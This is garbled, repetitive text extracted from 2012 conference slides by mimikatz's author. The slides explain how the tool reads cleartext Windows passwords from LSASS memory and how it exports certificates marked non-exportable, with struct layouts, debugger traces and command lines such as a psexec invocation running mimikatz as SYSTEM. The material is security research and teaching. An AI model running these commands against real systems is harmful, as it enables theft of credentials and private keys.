Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa history of laquo pass-the- raquo 12
mimikatz sekurlsa history of laquo pass-the- raquo 12
Pass-the-hash ndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo Hernan Ochoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticket ndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
Pass-the-hash ndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo Hernan Ochoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticket ndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 8 8
mimikatz sekurlsa history of laquo pass-the- raquo 22
mimikatz sekurlsa history of laquo pass-the- raquo 22
Pass-the-pass ndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3) bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memory bull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe) bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
Pass-the-pass ndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3) bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memory bull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe) bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9 9
mimikatz sekurlsa tspkg mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
because sometimes hash is not enoughhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10 10
mimikatz sekurlsa tspkg what is it
mimikatz sekurlsa tspkg what is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11 11
mimikatz sekurlsa tspkg questions
mimikatz sekurlsa tspkg questions
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12 12
mimikatz sekurlsa tspkg symbols amp theory
mimikatz sekurlsa tspkg symbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13 13
kdgt x tspkgclear 75016d1c tspkgTSObtainClearCreds = ltno type informationgt kdgt x tspkgpassword 75011b68 tspkgTSDuplicatePassword = ltno type informationgt 75011cd4 tspkgTSHidePassword = ltno type informationgt 750195ee tspkgTSRevealPassword = ltno type informationgt 75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgt kdgt x tspkglocate 7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkg workflow
mimikatz sekurlsa tspkg workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
KIWI_TS_PRIMARKIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0 LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64 BYTE unk0[108] elif defined _M_IX86 BYTE unk0[64] endif LUID LocallyUniqueIdentifier PVOID unk1 PVOID unk2 PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIAL
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
mimikatz sekurlsa tspkg demo time
mimikatz sekurlsa tspkg demo time
sekurlsatspkg
sekurlsatspkg
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15 15
mimikatz sekurlsa wdigest mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
because clear text password over httphttps is not cool
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16 16
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17 17
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18 18
mimikatz sekurlsa wdigest theory
mimikatz sekurlsa wdigest theory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
